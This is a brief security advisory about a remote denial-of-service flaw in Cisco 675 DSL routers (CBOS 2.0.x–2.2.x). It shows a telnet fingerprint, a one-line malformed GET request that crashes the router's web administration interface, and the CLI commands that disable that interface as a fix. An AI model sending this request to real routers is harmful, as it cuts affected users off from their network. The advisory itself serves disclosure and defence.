|
|
| |
| The Cisco 675 DSL routers with the Web Administration Interface enabled can be crashed remotely using a simple GET request. 'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x and 2.2.x so a large amount of such routers are vulnerable. |
| |
Credit:
The information has been provided by CDI.
|
| |
Vulnerable systems:
Cisco 675 DSL Router
CBOS versions 2.0.x through 2.2.x
Fingerprint:
telnet target.example.com 80
Connected to target.example.com.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 401 Unauthorized
Content-type: text/html
WWW-Authenticate: Basic realm="CISCO_WEB"
<CENTER><h1>Unauthorized Access 401</h1></center>
Connection closed by foreign host.
Exploit:
$ telnet target.example.com 80
Trying target.example.com...
Connected to target.example.com.
Escape character is '^]'.
GET ? [LF][LF]
Fix:
Disable the Web Based Administration Interface on your 675 until a patch or CBOS revision is made available.
Web Server Disable commands:
(CBOS 'enable' mode)
cbos# set web disabled
cbos# write
cbos# reboot
|
|
|
|
|
|
|
|
